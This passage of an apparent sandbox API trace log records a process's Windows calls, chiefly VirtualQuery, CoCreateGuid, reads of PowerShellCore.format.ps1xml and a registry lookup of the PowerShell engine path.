lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.981] VirtualQuery (in: lpAddress=0x10baa0, lpBuffer=0x10c960, dwLength=0x30 | out: lpBuffer=0x10c960*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.981] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.982] VirtualQuery (in: lpAddress=0x10baa0, lpBuffer=0x10c960, dwLength=0x30 | out: lpBuffer=0x10c960*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.982] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.983] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.984] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.985] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.986] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.986] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.986] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.987] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.987] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x95282161, Data2=0x91c9, Data3=0x4cca, Data4=([0]=0x8e, [1]=0xe7, [2]=0xb7, [3]=0xe1, [4]=0x3d, [5]=0x18, [6]=0xb9, [7]=0x6a))) returned 0x0 [0108.988] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.988] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.990] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.991] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.991] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.001] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.001] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.002] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.002] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.003] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.004] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.004] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.005] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.006] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.006] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.007] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.007] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x402445e5, Data2=0xaf3f, Data3=0x4d2e, Data4=([0]=0xb6, [1]=0x51, [2]=0xfc, [3]=0x5e, [4]=0xe, [5]=0x1d, [6]=0xa8, [7]=0xba))) returned 0x0 [0109.008] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xa18e34b8, Data2=0x1767, Data3=0x43ae, Data4=([0]=0x8e, [1]=0xa3, [2]=0xd5, [3]=0x63, [4]=0xa6, [5]=0x15, [6]=0xf7, [7]=0x78))) returned 0x0 [0109.008] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x278930b5, Data2=0x4293, Data3=0x4ba2, Data4=([0]=0xb8, [1]=0x3f, [2]=0x47, [3]=0x22, [4]=0xd, [5]=0x74, [6]=0x34, [7]=0x48))) returned 0x0 [0109.009] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x8f31f6cf, Data2=0x74aa, Data3=0x40a5, Data4=([0]=0xa3, [1]=0x35, [2]=0x40, [3]=0x36, [4]=0x59, [5]=0x9c, [6]=0x18, [7]=0x6c))) returned 0x0 [0109.011] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xf2f86b37, Data2=0x176b, Data3=0x4ee8, Data4=([0]=0x9e, [1]=0x36, [2]=0x4a, [3]=0xf0, [4]=0xfa, [5]=0x6e, [6]=0xfd, [7]=0x3f))) returned 0x0 [0109.011] VirtualQuery (in: lpAddress=0x10b870, lpBuffer=0x10c730, dwLength=0x30 | out: lpBuffer=0x10c730*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.012] VirtualQuery (in: lpAddress=0x10b900, lpBuffer=0x10c7c0, dwLength=0x30 | out: lpBuffer=0x10c7c0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.012] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xf579d286, Data2=0x879e, Data3=0x456b, Data4=([0]=0xa1, [1]=0xd1, [2]=0xb2, [3]=0xd2, [4]=0x93, [5]=0xab, [6]=0xe7, [7]=0xf5))) returned 0x0 [0109.012] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x326c3ce8, Data2=0x4235, Data3=0x4659, Data4=([0]=0xbd, [1]=0x33, [2]=0xc1, [3]=0xbd, [4]=0xfa, [5]=0xb0, [6]=0x3e, [7]=0xed))) returned 0x0 [0109.013] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xfe416f6d, Data2=0x8ce0, Data3=0x412c, Data4=([0]=0xb2, [1]=0xa, [2]=0xae, [3]=0x83, [4]=0x82, [5]=0xbb, [6]=0xb7, [7]=0x1e))) returned 0x0 [0109.014] SetErrorMode (uMode=0x1) returned 0x1 [0109.014] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x340 [0109.014] SetErrorMode (uMode=0x1) returned 0x1 [0109.014] GetFileType (hFile=0x340) returned 0x1 [0109.015] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.063] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.069] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.071] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.071] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.072] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.072] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.073] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.073] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.075] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.075] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.079] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.079] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.080] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.080] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.080] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.080] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.083] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.084] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.084] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.084] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.084] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0xe67, lpOverlapped=0x0) returned 1 [0109.085] ReadFile (in: hFile=0x340, lpBuffer=0x3a38e2f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a38e2f*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0109.085] ReadFile (in: hFile=0x340, lpBuffer=0x3a39860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3a39860*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0109.085] SetErrorMode (uMode=0x1) returned 0x1 [0109.085] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0109.086] SetErrorMode (uMode=0x1) returned 0x1 [0109.086] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x340) returned 0x0 [0109.086] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0109.086] CoTaskMemAlloc (cb=0x5a) returned 0x2a1c30 [0109.086] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x2a1c30, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0109.086] CoTaskMemFree (pv=0x2a1c30) [0109.086] RegCloseKey (hKey=0x340) returned 0x0 [0109.098] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xea2014cf, Data2=0x42ec, Data3=0x4bd9, Data4=([0]=0x9c, [1]=0x9a, [2]=0x5d, [3]=0x52, [4]=0x22, [5]=0x88, [6]=0xed, [7]=0xac))) returned 0x0 [0109.098] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x77ca745f, Data2=0x9cf1, Data3=0x42a2, Data4=([0]=0xb6, [1]=0x7, [2]=0x1e, [3]=0x24, [4]=0x41, [5]=0x94, [6]=0xed, [7]=0x5a))) returned 0x0 [0109.099] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x7c1ab1fd, Data2=0xb845, Data3=0x4f01, Data4=([0]=0xb6, [1]=0x2, [2]=0x33, [3]=0x56, [4]=0xbb, [5]=0xb9, [6]=0xa2, [7]=0xc6))) returned 0x0 [0109.099] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x3aa0c285, Data2=0xcb3b, Data3=0x424b, Data4=([0]=0x9f, [1]=0x60, [2]=0x8b, [3]=0xb5, [4]=0xc9, [5]=0x27, [6]=0xd1, [7]=0x81))) returned 0x0 [0109.099] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x20ff06ab, Data2=0x2e6, Data3=0x4133, Data4=([0]=0xa8, [1]=0x97, [2]=0xe1, [3]=0x6, [4]=0xd, [5]=0x8b, [6]=0xba, [7]=0x3a))) returned 0x0 [0109.100] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x3aa4a8ae, Data2=0x15d8, Data3=0x456a, Data4=([0]=0xa6, [1]=0xeb, [2]=0x75, [3]=0x26, [4]=0x55, [5]=0x72, [6]=0xd6, [7]=0xec))) returned 0x0 [0109.100] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x49ce111a, Data2=0xd482, Data3=0x4b96, Data4=([0]=0x85, [1]=0x3d, [2]=0x6b, [3]=0xe7, [4]=0x72, [5]=0xe, [6]=0x5d, [7]=0x7d))) returned 0x0 [0109.100] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.101] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x7605e708, Data2=0x3b35, Data3=0x430a, Data4=([0]=0xbb, [1]=0x87, [2]=0x98, [3]=0xc2, [4]=0xdf, [5]=0x88, [6]=0x8e, [7]=0x52))) returned 0x0 [0109.101] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xd3dca89, Data2=0xe181, Data3=0x4b8e, Data4=([0]=0xa6, [1]=0xd8, [2]=0x51, [3]=0x81, [4]=0x48, [5]=0xe4, [6]=0x30, [7]=0x42))) returned 0x0 [0109.102] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xc680928d, Data2=0x2f11, Data3=0x4a5d, Data4=([0]=0xb8, [1]=0xe4, [2]=0xc5, [3]=0x23, [4]=0x8a, [5]=0x26, [6]=0xbb, [7]=0x57))) returned 0x0 [0109.102] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xf6e978a5, Data2=0x1b31, Data3=0x49d4, Data4=([0]=0x9f, [1]=0x4e, [2]=0x0, [3]=0xb, [4]=0x21, [5]=0x4e, [6]=0x17, [7]=0x8))) returned 0x0 [0109.103] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x9ca27ef3, Data2=0x63f, Data3=0x4370, Data4=([0]=0xb8, [1]=0xef, [2]=0x54, [3]=0x8c, [4]=0x25, [5]=0x6b, [6]=0x9b, [7]=0x36))) returned 0x0 [0109.103] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x459e158a, Data2=0x3177, Data3=0x4734, Data4=([0]=0x8f, [1]=0xc, [2]=0x5e, [3]=0xd0, [4]=0x22, [5]=0xa8, [6]=0xcc, [7]=0x86))) returned 0x0 [0109.103] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xe32a1807, Data2=0x7035, Data3=0x478a, Data4=([0]=0xa2, [1]=0x42, [2]=0x8d, [3]=0x4d, [4]=0x2b, [5]=0xde, [6]=0x6, [7]=0x3a))) returned 0x0 [0109.103] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x4b7a630, Data2=0x778d, Data3=0x4524, Data4=([0]=0x80, [1]=0x29, [2]=0xd1, [3]=0x4b, [4]=0x22, [5]=0x6b, [6]=0x8f, [7]=0xc6))) returned 0x0 [0109.104] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xaa48be28, Data2=0xc204, Data3=0x4655, Data4=([0]=0xbd, [1]=0xbd, [2]=0x8d, [3]=0xeb, [4]=0xc8, [5]=0x83, [6]=0xf6, [7]=0x9a))) returned 0x0 [0109.104] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xd53328bd, Data2=0x1a10, Data3=0x4b83, Data4=([0]=0x93, [1]=0xa3, [2]=0x93, [3]=0x56, [4]=0x2b, [5]=0xf1, [6]=0xee, [7]=0x96))) returned 0x0 [0109.104] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x4c57d117, Data2=0x401e, Data3=0x4b81, Data4=([0]=0x90, [1]=0x50, [2]=0xe, [3]=0x2d, [4]=0x5c, [5]=0x9d, [6]=0xcc, [7]=0x79))) returned 0x0 [0109.105] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x48eac000, Data2=0x4922, Data3=0x4feb, Data4=([0]=0xa2, [1]=0x43, [2]=0xd7, [3]=0xfe, [4]=0xb4, [5]=0x9, [6]=0x4, [7]=0xea))) returned 0x0 [0109.105] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.106] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.106] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.107] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x9640a52, Data2=0x5014, Data3=0x484e, Data4=([0]=0x93, [1]=0x92, [2]=0x9a, [3]=0xc6, [4]=0x29, [5]=0x9a, [6]=0xde, [7]=0xce))) returned 0x0 [0109.107] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xd32ed78, Data2=0x368c, Data3=0x45e9, Data4=([0]=0x8b, [1]=0xf7, [2]=0xa5, [3]=0x1e, [4]=0x38, [5]=0x88, 